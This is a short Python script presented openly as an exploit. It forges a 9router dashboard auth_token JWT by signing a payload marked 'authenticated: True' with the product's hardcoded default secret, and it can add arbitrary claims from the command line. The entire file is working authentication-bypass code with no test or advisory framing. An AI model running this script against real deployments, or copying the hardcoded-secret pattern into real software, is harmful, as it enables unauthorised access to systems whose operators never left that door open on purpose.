#!/usr/bin/env python3
"""Forge a 9router dashboard auth_token JWT signed with the known hardcoded secret."""
import base64, hmac, hashlib, json, time, sys

SECRET = "9router-default-secret-change-me"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def forge(exp_seconds=86400, extra_claims=None):
    header = {"alg": "HS256", "typ": "JWT"}
    now = int(time.time())
    payload = {"authenticated": True, "iat": now, "exp": now + exp_seconds}
    if extra_claims:
        payload.update(extra_claims)
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{h}.{p}".encode()
    sig = hmac.new(SECRET.encode(), signing_input, hashlib.sha256).digest()
    return f"{h}.{p}.{b64url(sig)}"

if __name__ == "__main__":
    extra = {}
    if len(sys.argv) > 1 and sys.argv[1] == "--with-claims":
        # parse extra claims from remaining args as key=value
        for kv in sys.argv[2:]:
            k, v = kv.split("=", 1)
            extra[k] = v
    print(forge(extra_claims=extra))
